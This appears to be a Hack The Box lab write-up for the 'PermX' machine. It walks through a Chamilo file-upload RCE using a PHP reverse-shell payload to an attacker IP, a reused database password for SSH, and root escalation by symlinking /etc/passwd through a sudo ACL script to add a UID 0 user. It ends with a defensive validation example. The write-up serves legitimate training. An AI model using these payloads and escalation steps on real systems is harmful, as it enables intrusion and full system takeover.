PermX – Hack The Box – @lautarovculic

User.txt

Let’s see what ports are open with nmap:

    sudo nmap -sV -p- -Pn -vv -T4 10.10.11.23

Output:

    PORT   STATE SERVICE REASON         VERSION
    22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.52
    Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let’s add permx.htb and lms.permx.htb to our /etc/hosts file:

    echo "10.10.11.23 permx.htb" | sudo tee -a /etc/hosts
    echo "10.10.11.23 lms.permx.htb" | sudo tee -a /etc/hosts

I found this RCE:

https://starlabs.sg/advisories/23/23-4220/

With it, you can create an rce.php file with this content:

    <?PHP exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.XXX/1337 0>&1'"); ?>

Then set up your nc listener on port 1337 and run:

    curl -F 'bigUploadFile=@rce.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'

    curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/rce.php'

Then we will get a shell as www-data.

The Chamilo configuration file holds the database password, which is also the password for the mtz user:

    cat /var/www/chamilo/app/config/configuration.php | grep "db_password"
    $_configuration['db_password'] = '03F6lY3uXAP2bkW8';

Password: 03F6lY3uXAP2bkW8

Log in via SSH as mtz and get the flag:

    mtz@permx:~$ cat user.txt
    f17726a0**************bb828

Root.txt

sudo -l shows that mtz can run /opt/acl.sh with sudo, without a password:

    sudo -l
    Matching Defaults entries for mtz on permx:
        env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty

    User mtz may run the following commands on permx:
        (ALL : ALL) NOPASSWD: /opt/acl.sh

Then we can create a symlink to /etc/passwd inside our home directory, use the script to give mtz rwx on it through the symlink, and append a new user with UID 0:

    ln -s /etc/passwd /home/mtz/lautaro; sudo /opt/acl.sh mtz rwx /home/mtz/lautaro && ls -lah /etc/passwd && echo 'bob:$1$0x9dr7bj$zvLns.f4tmL1tAi53h6.F1:0:0:root:/root:/bin/bash' >> /etc/passwd && su bob

The password for bob is 123.

And then:

    Password:
    root@permx:/home/mtz# cd
    root@permx:~# cat root.txt
    9ac35a*************66a0e87
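
The root step works because a root-run script changed permissions on a path the user controls, and that path was a symlink. As an added example (not the contents of /opt/acl.sh, which this page does not show), here is one way a wrapper of that kind could validate its target first; `safe_target` and `ALLOWED_BASE` are assumed names:

```bash
# Added example: target validation for a hypothetical root-run ACL wrapper.
# ALLOWED_BASE and safe_target are assumed names, not taken from /opt/acl.sh.
ALLOWED_BASE="${ALLOWED_BASE:-/home/mtz}"

# safe_target PATH
# Prints the canonical path and returns 0 only if PATH is a regular,
# non-symlink file whose resolved location lies inside ALLOWED_BASE.
safe_target() {
    local target="$1" base resolved

    # Reject a symlink as the final component before anything follows it.
    if [ -L "$target" ]; then
        echo "refusing symlink: $target" >&2
        return 1
    fi

    # Canonicalise both sides so ".." and symlinked parent directories
    # cannot make an outside file look like it sits under the base.
    base=$(readlink -f -- "$ALLOWED_BASE") || return 1
    resolved=$(readlink -f -- "$target") || return 1

    case "$resolved" in
        "$base"/*) ;;   # strictly below the base directory
        *) echo "outside $base: $resolved" >&2; return 1 ;;
    esac

    # Only plain files: no directories, devices, sockets or FIFOs.
    if [ ! -f "$resolved" ]; then
        echo "not a regular file: $resolved" >&2
        return 1
    fi

    printf '%s\n' "$resolved"
}

# How a wrapper would use it (left as a comment so this file has no effect):
#   target=$(safe_target "$3") || exit 1
#   setfacl -m "u:$1:$2" "$target"
```

The check and the later permission change are not atomic, so a user who can write to the directory can still race it. The stronger fix is to not let a root-run script modify user-chosen paths at all.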
				
			

I hope you found it useful (:
